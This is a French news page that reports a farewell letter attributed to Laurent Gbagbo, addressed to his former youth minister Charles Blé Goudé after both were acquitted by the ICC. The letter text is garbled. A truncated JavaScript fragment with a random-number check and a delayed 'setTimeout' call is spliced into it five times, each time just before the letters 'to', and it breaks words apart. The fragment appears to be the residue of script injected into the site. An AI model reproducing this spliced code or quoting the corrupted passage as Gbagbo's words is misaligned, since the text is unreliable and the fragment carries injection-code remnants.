Côte d’Ivoire : le message de Gbagbo à Blé Goudé avant son départ pour la Belgique

Avant de quitter les Pays-Bas par la route pour rejoindre son pays d’accueil,  la Belgique, Laurent Gbagbo a écrit à son dernier ministre de la jeunesse et compagnon de prison Charles Blé Goudé.

Mon fils Blé Goudé je ne sais pas si nous serons encore dans un même pays mais dans le cas contraire sache que l’Afrique est avec dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toi, nous sommes dans une lutte que nous ne pouvons imaginer, combien de fois nous compdom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tons pour l’Afrique. Donc là où tu seras que dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ton OUI ou NON soit une liberté de souveraineté pour l’Afrique. Tu ne mènes pas un combat pour moi Gbagbo ni un combat pour dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toi-même non plus mais pour une Afrique digne.

Je sais que tu me manqueras mais saches qu’on se verra en Afrique précisément en Côte d’Ivoire dans les mois à venir.

Et saches que c’est maintenant que la lutte commencera. Alors ne baisses pas les bras. Et je tiens à t’informer que je suis fier de dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toi car tu m’as donné vive joie et courage dans notre cellule du bâtiment 32.

Essuies tes larmes et ne pleures pas car je compte sur dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toi et réciproquement.

Laurent Koudou Gbagbo

Voilà en substance, le message de l’Ex Chef d’état ivoirien Laurent Gbagbo acquitté par la cours pénal internationale (CPI) à son “fils” Charles Blé Goudé, acquitté lui aussi par cette même cours.

ElitesPress

 

  • 10
  •  
  •  
  •  
  •  
    10
    Partages
  • 254
    Partages

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *

%d blogueurs aiment cette page :